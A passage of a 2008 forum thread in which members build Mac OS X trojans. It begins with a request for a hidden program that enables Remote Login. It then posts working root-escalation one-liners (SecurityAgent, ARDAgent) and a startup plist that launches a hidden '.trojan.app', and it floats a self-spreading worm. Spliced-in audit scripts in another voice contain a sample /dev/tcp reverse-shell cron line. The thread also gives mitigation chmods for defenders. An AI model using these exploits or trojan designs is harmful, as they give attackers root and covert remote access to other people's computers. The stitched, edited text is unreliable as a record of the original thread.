remote login Trojan, Trying to make a program that will select remote login.
lokin
post May 18 2008, 04:44 PM
Post #1
******** EDIT Begins **********

6/25/08 EDIT *IMPORTANT* For Visitors:
QUOTE
The following links to our knowledge base contain further information on this subject, including Solutions, Discovery, Templates, and more:
ARDAgent exploit & Com.apple.SystemLoginItems.plist Exploit

- Spratt_

******** EDIT Complete **********


So the deal is I'm trying to write a script that will locate Preferences ---> Sharing ---> and then select Remote Login if there are write privileges.
This will be my first attempt at making something that does this so please give me a break.
what language should I use? perl?
what compiler? Xcode?
The program also has to run in the background, or be embedded in a file or document of some kind.
Once again I have no experience here so please help all you can.
p.s. please don't write the code and say "here's an example", I'll end up copying most of it.
Oktane
post Jun 21 2008, 03:35 PM
Post #541
CODE
-- If SecurityAgent is open kill it
try
    do shell script "killall SecurityAgent"
end try

-- Setup SecurityAgent
ignoring application responses
    do shell script "sudo -s"
end ignoring

-- Exploit
tell application "SecurityAgent" to do shell script "id"


Output:
QUOTE
"uid=92(securityagent) gid=0(wheel) groups=0(wheel)"
LET'S TOAST THE RICH... WITH OUR CHOICE OF COCKTAIL!
callmenames
post Jun 21 2008, 03:52 PM
Post #542
QUOTE(Oktane @ Jun 21 2008, 01:19 PM) *
As we draw closer to the next exploit, how about we keep it on the down low: PM, IRC or a thread that's a little less HOT. Just a suggestion.

I understand what you mean, and I won't disclose anything privately shared with me by someone else. For my purposes though, I probably will continue to openly post any vulnerabilities which I run across myself - because my goal is to get more people interested in programming on Macs and the topic of vulnerabilities brings people in by the droves and gets them interested. Now to get them writing and posting CODE in this forum!... :)
Oktane
post Jun 21 2008, 04:40 PM
Post #543
I was thinking and came up with a funny idea: how about we make an anti-trojan virus? An AppleScript application that fixes permissions on SystemLoginItems.plist and ARDAgent.app and removes the old trojan if it was installed. Then it notifies the user they were patched and spreads through their Mail account if they have one.

Since both of these exploits have been around for the better half of a decade, this might just force Apple's hand.

This post has been edited by Oktane: Jun 21 2008, 04:41 PM
callmenames
post Jun 21 2008, 04:50 PM
Post #544
That still leaves the dreaded "rm -Rf ~" trojan. GASP!
(For anyone who doesn't already know what that command does...

rm=remove,
-R=recursive meaning all subfolders,
-f=force as in just delete stuff and don't ask me any question,
~=your user home folder.

So the command is essentially "remove my home folder and all subfolders inside it and don't ask me any questions". Obviously, it's probably not something anyone would want to have happen, so don't run the command.)

You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?
Oktane
post Jun 21 2008, 05:01 PM
Post #545
QUOTE(callmenames @ Jun 21 2008, 04:50 PM) *
You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?

Especially if they don't fully understand what it does.
callmenames
post Jun 21 2008, 05:17 PM
Post #546
Exactly! There is a lot of misinformation due to SecureMac's woefully inaccurate press release and the bizarre interpretations thereof by the Internet media sites. So a detailed explanation of what it actually does and how a user could manually do or undo the same things would help a lot of people to understand not just your own trojan but many of the features of Mac OS X in general.

For instance, in "AppleScript trojan horse template" or AStht, are subroutines which add a cron task to run shell scripts for a reverse-shell or reverse-VNC session. Cron is a program included in OS X which runs commands at a scheduled time. More information on cron can be found by opening the Terminal program and typing 'man cron' without the quotes to see the manual page for cron. Apple has a copy of that information available online as well http://developer.apple.com/documentation/D...an8/cron.8.html

A user can see what, if any, entries are listed in the crontab file for the user by running the Terminal program and issuing the command:
crontab -l

All the entries can be easily removed with this command:
crontab -r

That will remove the two cron entries which "AppleScript trojan horse template" or AStht adds to create the reverse-shell and/or reverse VNC session.

This post has been edited by callmenames: Jun 21 2008, 05:32 PM
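An added example to go with the cron cleanup above (my script, not callmenames' and not part of the AStht template): instead of `crontab -r`, which wipes every entry including legitimate ones, this reads a crontab, flags the lines that look like a reverse-shell or reverse-VNC call-back, and writes the rest back out. The indicator patterns (netcat, `/dev/tcp`, `ssh -R`, VNC reverse-connect flags) and the sample crontab are assumptions constructed for the demo; the real template's commands may differ, so adjust the regex to what you actually find with `crontab -l`.

```shell
#!/bin/sh
# Added example (not code from the thread or the AStht template): check a
# crontab for entries that call back to a remote host, and drop only those
# lines instead of wiping everything with `crontab -r`. The indicator
# patterns are assumptions made for this example; tune them to the entries
# the template you are cleaning up really installs.

# Exit 0 when a crontab line looks like a reverse shell / reverse VNC hook.
suspicious_cron_line() {
    line=$1
    case "$line" in
        ''|'#'*) return 1 ;;      # blank lines and comments are never flagged
    esac
    # netcat family, bash's /dev/tcp pseudo-device, ssh remote forwards (-R),
    # and VNC clients/servers started in reverse (-connect / -listen) mode
    printf '%s\n' "$line" | grep -Eq \
        '(^|[[:space:]/])(nc|ncat|netcat)[[:space:]]|/dev/tcp/|ssh[[:space:]].*-R[[:space:]]|vnc.*(-connect|-listen)'
}

# Read crontab text on stdin, write it back out minus the flagged lines.
# Flagged lines go to stderr so you can see exactly what was removed.
filter_crontab() {
    while IFS= read -r line; do
        if suspicious_cron_line "$line"; then
            printf 'REMOVED: %s\n' "$line" >&2
        else
            printf '%s\n' "$line"
        fi
    done
}

# Constructed sample crontab for the demo (assumed content, not from a real Mac).
sample_crontab() {
    printf '%s\n' \
        '# nightly cache cleanup' \
        '0 3 * * * /usr/bin/find "$HOME/Library/Caches" -mtime +7 -delete' \
        '*/5 * * * * /bin/bash -c "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"' \
        '@reboot /usr/bin/ssh -N -R 5900:127.0.0.1:5900 user@198.51.100.7'
}

# Usage:
#   sh cron_audit.sh demo      -> run the filter over the constructed sample
#   . ./cron_audit.sh; crontab -l | filter_crontab > "$HOME/crontab.clean" \
#       && crontab "$HOME/crontab.clean"
if [ "${1:-}" = demo ]; then
    sample_crontab | filter_crontab
fi
```

Running the demo keeps the comment and the `find` job and reports the two call-back lines on stderr. Reinstalling the filtered file with `crontab <file>` replaces the user's crontab, so review the REMOVED lines before doing that.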
Oktane
post Jun 21 2008, 06:08 PM
Post #547
So is there any way to duplicate the MOAB in some form, or has that been fully patched? The thing is that as long as that SystemLoginItems.plist is around there will always be an exploit; it just bugs me.

Exploits that need to get patched:
1. Trojan can create a hidden user (or any other application)
2. ARDAgent exploit
3. SystemLoginItems.plist
Macpunk
post Jun 21 2008, 06:17 PM
Post #548
Everybody who cares has already read this thread twice, and prolly found more anyways. ;-P

--Macpunk
callmenames
post Jun 21 2008, 08:01 PM
Post #549
QUOTE(Oktane @ Jun 21 2008, 04:08 PM) *
So is there any way to duplicate the MOAB in some form, or has that been fully patched?

I can personally attest to the fact that some of the vulnerabilities disclosed in the "Month of Apple Bugs" project remain unpatched.
http://projects.info-pull.com/moab/
Oktane
post Jun 21 2008, 08:36 PM
Post #550
UNOFFICIAL FULL DISCLOSURE

ARDAgent.app Exploit

AFFECTED: Mac OS X 10.4 - 10.5
Risk: Critical
USAGE: Easy

History: Discovered at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Wawl, Oktane and andrewtheshit. First implemented in AppleScript but can be ported to Bash (Bourne Again Shell). Used in proof-of-concept type trojans throughout the thread. Poses high risk for ease of use and lack of experience required. Allows the attacker to run any code, malicious or otherwise. This vulnerability also affects all operating systems released 10.4 and above, because this application is included by default.

Usage:
Original Script (AppleScript):
CODE
tell application "ARDAgent.app" to do shell script "id"

Bash Script (Bourne Again Shell):
CODE
osascript -e 'tell application "ARDAgent" to do shell script "id"'


This will give an output of uid 0, or root, the superuser of Unix-based computers, when run by an administrator. The reason for this vulnerability is that the application ARDAgent.app (located: /System/Library/CoreServices/ARDAgent.app) runs as root. An oversight or mistake by the programmers and maintainers of Mac OS X. Note that this exploit can only be achieved if the affected user is an administrator.

Solutions: A temporary solution for the mainstream Mac OS X owner, until a patch is released by Apple in a future Software Update, is to change the permissions of the application ARDAgent.app. This is an easy fix and should be distributed immediately, as the trojans specified above have been released to the public.

1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
CODE
cd /System/Library/CoreServices

3. Enter:
CODE
# the setuid bit is on the executable inside the bundle (not on the .app folder); on 10.4/10.5 the bundle sits in the RemoteManagement subdirectory
sudo chmod u-s RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

4. You will be prompted to enter your password, do so.
5. Check to make sure that this is working by running the exploit again.
Enter:
CODE
osascript -e 'tell application "ARDAgent" to do shell script "id"'

You should see your username displayed as the uid.

com.apple.SystemLoginItems.plist Exploit

AFFECTED: Mac OS X 10.3 - 10.5
Risk: Medium
USAGE: Medium

History: Made public at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Lokin, Oktane and andrewtheshit. First implemented in AppleScript but can be ported into Bash (Bourne Again Shell) and other programming languages. Used in proof of concept type trojans throughout the thread. Poses medium risk for medium ease of use and number of computers affected. Allows the attacker to run any code, malicious or otherwise. This exploit has evidently existed for quite some time now (the better half of a decade).

Usage: The file is located in /Library/Preferences/com.apple.SystemLoginItems.plist
Example:
CODE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>AutoLaunchedApplicationDictionary</key>
    <array>
        <dict>
            <key>Hide</key>
            <true/>
            <key>Path</key>
            <string>/Library/Caches/.trojan.app</string>
        </dict>
    </array>
</dict>
</plist>


The file can be overwritten, edited or replaced. The fault lies in the permissions set upon this file, allowing anyone to edit the SystemLoginItems.plist. Upon restart the application is then run as a start-up item under root, or uid 0, the superuser of Unix-based computers. A payload for this exploit could easily be created as a compiled AppleScript application (or bundle), which already exists in the wild. The reason for the medium risk also involves the easy detection of the exploit by knowledgeable users. A trojan can hide itself and replace the plist file after use, but the user must not detect the attack before restarting the computer. However, the trojan might actually restart the computer on its own, posing a larger risk but a higher rate of detection.

Solutions: A temporary solution for the mainstream Mac OS X owner, until a patch is released by Apple in a future Software Update, is to change the permissions of the plist file /Library/Preferences/com.apple.SystemLoginItems.plist. This is an easy fix and should be distributed immediately, as the trojans specified above have been released to the public.

1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:
CODE
cd /Library/Preferences

3. Enter:
CODE
# u-s has no effect on a data file; what stops other users editing it is removing group/other write access
sudo chmod go-w com.apple.SystemLoginItems.plist

4. You will be prompted to enter your password, do so.
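An added example covering both checks from the post above (my script, not Oktane's): it reports whether the ARDAgent executable carries the setuid bit, whether com.apple.SystemLoginItems.plist or the directory holding it is writable by anyone other than the owner (a writable directory lets the file be replaced even when the file itself is locked down, which the chmod steps above do not cover), lists the Path entries the plist would launch, and with `fix` applies the two chmods. The default ARDAgent path places the bundle under CoreServices/RemoteManagement, which is an assumption about the 10.4/10.5 layout; both paths can be overridden through the environment, and the test data is constructed.

```shell
#!/bin/sh
# Added example (not code from the thread): audit and optionally harden the
# two conditions described in the post. Default paths are assumptions about
# the 10.4/10.5 layout; override ARDAGENT_BIN / LOGIN_ITEMS_PLIST if needed.
ARDAGENT_BIN=${ARDAGENT_BIN:-/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent}
LOGIN_ITEMS_PLIST=${LOGIN_ITEMS_PLIST:-/Library/Preferences/com.apple.SystemLoginItems.plist}

# Exit 0 when the file has the setuid bit set (the ARDAgent condition).
is_setuid() { [ -u "$1" ]; }

# Exit 0 when group or others may write the path. Read from `ls -ld` because
# the stat(1) flags differ between the BSD (Mac) and GNU userlands; the
# group-write flag is column 6 and the other-write flag is column 9.
writable_by_non_owner() {
    [ -e "$1" ] || return 1
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# Print the Path string of every entry in the plist, one per line, so the
# reader can compare them with what the machine is supposed to launch.
login_item_paths() {
    awk '/<key>Path<\/key>/ { want = 1; next }
         want && /<string>/ { sub(/.*<string>/, ""); sub(/<\/string>.*/, ""); print; want = 0 }' "$1"
}

# Exit 1 if the ARDAgent binary is setuid, 0 otherwise (or if it is absent).
audit_ardagent() {
    if [ ! -e "$1" ]; then echo "skip: $1 not present"; return 0; fi
    if is_setuid "$1"; then echo "WARN: $1 is setuid"; return 1; fi
    echo "ok: $1 is not setuid"
}

# Exit 1 if the plist or its directory is writable by non-owners.
audit_login_items() {
    plist=$1
    dir=$(dirname "$plist")
    status=0
    if writable_by_non_owner "$plist"; then
        echo "WARN: $plist is writable by group/others"; status=1
    fi
    if writable_by_non_owner "$dir"; then
        echo "WARN: $dir is writable by group/others (file can be replaced)"; status=1
    fi
    [ -e "$plist" ] && login_item_paths "$plist" | sed 's/^/launches: /'
    return $status
}

# The remediation from the post: drop setuid from ARDAgent and remove
# group/other write access on the plist. Needs root for the real paths.
harden() {
    [ -e "$1" ] && chmod u-s "$1"
    [ -e "$2" ] && chmod go-w "$2"
    return 0
}

# Usage:  sh audit.sh audit          (report only)
#         sudo sh audit.sh fix       (report, then apply the two chmods)
case "${1:-}" in
    audit) audit_ardagent "$ARDAGENT_BIN"; audit_login_items "$LOGIN_ITEMS_PLIST" ;;
    fix)   audit_ardagent "$ARDAGENT_BIN"; audit_login_items "$LOGIN_ITEMS_PLIST"
           harden "$ARDAGENT_BIN" "$LOGIN_ITEMS_PLIST" ;;
esac
```

Re-run with `audit` after `fix` to confirm the warnings are gone; the step-5 check from the post (`osascript -e 'tell application "ARDAgent" to do shell script "id"'`) is still the definitive test that the setuid path no longer yields uid 0.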